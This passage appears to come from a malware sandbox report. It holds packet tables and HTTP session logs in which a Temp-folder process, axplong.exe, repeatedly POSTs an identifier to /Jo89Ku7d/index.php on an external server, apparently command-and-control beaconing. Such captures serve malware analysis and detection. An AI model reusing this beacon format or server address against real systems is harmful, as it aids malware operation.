Sep 27, 2024 07:03:18.199875116 CEST	49784	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:18.200252056 CEST	49784	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:18.205235004 CEST	80	49784	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:18.955430031 CEST	80	49784	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:18.955507994 CEST	49784	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.074059963 CEST	49784	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.074493885 CEST	49785	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.261369944 CEST	80	49784	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:19.261642933 CEST	80	49785	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:19.261668921 CEST	80	49784	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:19.261708021 CEST	49785	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.261894941 CEST	49784	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.261894941 CEST	49784	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.262376070 CEST	49785	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.267105103 CEST	80	49785	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:19.975303888 CEST	80	49785	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:19.975517988 CEST	49785	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.978389978 CEST	49785	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.978846073 CEST	49786	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.983624935 CEST	80	49785	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:19.983700991 CEST	80	49786	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:19.983760118 CEST	49785	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.983784914 CEST	49786	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.984069109 CEST	49786	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:19.988836050 CEST	80	49786	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:20.697779894 CEST	80	49786	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:20.697875977 CEST	49786	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.805542946 CEST	49786	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.805926085 CEST	49787	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.810611010 CEST	80	49786	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:20.810700893 CEST	49786	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.810704947 CEST	80	49787	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:20.810853004 CEST	49787	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.811088085 CEST	49787	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.815821886 CEST	80	49787	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:20.819169998 CEST	49787	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.823645115 CEST	49788	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.828538895 CEST	80	49788	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:20.829135895 CEST	49788	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.829135895 CEST	49788	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:20.834022045 CEST	80	49788	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:21.645081043 CEST	80	49788	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:21.645272017 CEST	49788	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:21.763673067 CEST	49788	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:21.763997078 CEST	49789	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:21.768810034 CEST	80	49789	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:21.768943071 CEST	49789	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:21.768955946 CEST	80	49788	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:21.769006014 CEST	49788	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:21.769092083 CEST	49789	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:21.773924112 CEST	80	49789	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:22.467437029 CEST	80	49789	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:22.467884064 CEST	49789	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:22.488420010 CEST	49789	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:22.488708019 CEST	49790	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:22.493465900 CEST	80	49789	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:22.493525028 CEST	80	49790	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:22.493577003 CEST	49789	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:22.493634939 CEST	49790	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:22.493982077 CEST	49790	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:22.498742104 CEST	80	49790	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:23.207526922 CEST	80	49790	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:23.207721949 CEST	49790	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:23.321490049 CEST	49790	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:23.321882010 CEST	49791	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:23.326728106 CEST	80	49791	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:23.326808929 CEST	49791	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:23.326956034 CEST	49791	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:23.327193975 CEST	80	49790	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:23.327290058 CEST	49790	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:23.331870079 CEST	80	49791	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:24.034288883 CEST	80	49791	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:24.034445047 CEST	49791	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:24.038022041 CEST	49791	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:24.038535118 CEST	49792	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:24.043040037 CEST	80	49791	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:24.043104887 CEST	49791	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:24.043418884 CEST	80	49792	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:24.043489933 CEST	49792	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:24.043750048 CEST	49792	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:24.048504114 CEST	80	49792	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:24.932769060 CEST	80	49792	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:24.932952881 CEST	49792	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.041990042 CEST	49792	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.042223930 CEST	49793	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.046986103 CEST	80	49792	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:25.047391891 CEST	80	49793	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:25.047451973 CEST	49792	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.047517061 CEST	49793	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.047739029 CEST	49793	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.052479982 CEST	80	49793	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:25.774473906 CEST	80	49793	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:25.776180983 CEST	49793	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.778610945 CEST	49793	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.778907061 CEST	49794	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.783699989 CEST	80	49793	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:25.784075975 CEST	80	49794	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:25.784142017 CEST	49793	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.784172058 CEST	49794	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.784295082 CEST	49794	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:25.789419889 CEST	80	49794	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:26.516284943 CEST	80	49794	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:26.516350985 CEST	49794	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:26.640825033 CEST	49794	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:26.641119003 CEST	49795	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:26.645921946 CEST	80	49794	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:26.645977020 CEST	49794	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:26.646059990 CEST	80	49795	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:26.646353960 CEST	49795	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:26.647849083 CEST	49795	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:26.652620077 CEST	80	49795	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:27.350248098 CEST	80	49795	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:27.350318909 CEST	49795	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.353156090 CEST	49795	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.353933096 CEST	49796	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.358119011 CEST	80	49795	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:27.358180046 CEST	49795	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.358725071 CEST	80	49796	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:27.358810902 CEST	49796	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.359035015 CEST	49796	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.363895893 CEST	80	49796	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:27.365427017 CEST	49796	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.477763891 CEST	49797	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.482688904 CEST	80	49797	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:27.484196901 CEST	49797	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.484380007 CEST	49797	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:27.489168882 CEST	80	49797	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:28.183264017 CEST	80	49797	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:28.183346987 CEST	49797	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:28.186784983 CEST	49797	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:28.187220097 CEST	49798	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:28.191708088 CEST	80	49797	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:28.191778898 CEST	49797	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:28.191972971 CEST	80	49798	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:28.192244053 CEST	49798	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:28.192547083 CEST	49798	80	192.168.2.8	185.215.113.16
Sep 27, 2024 07:03:28.197345972 CEST	80	49798	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:28.900022030 CEST	80	49798	185.215.113.16	192.168.2.8
Sep 27, 2024 07:03:28.900291920 CEST	49798	80	192.168.2.8	185.215.113.16

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:04.652661085 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:05.371542931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:05.431461096 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:05.663382053 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:05.903161049 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:06.568217039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:06.569134951 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:06.797986984 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49713	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:06.918184996 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:07.612451077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:07.613982916 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:07.836779118 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49714	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:07.949237108 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:08.647757053 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:08.649630070 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:08.873267889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49715	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:08.981189966 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:09.708692074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:09.709614038 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:09.943667889 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49716	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:10.064166069 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:10.771675110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:10.772545099 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:11.004168034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49717	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:11.121480942 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:11.815941095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:11.816812992 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:12.040062904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49718	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:12.156254053 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
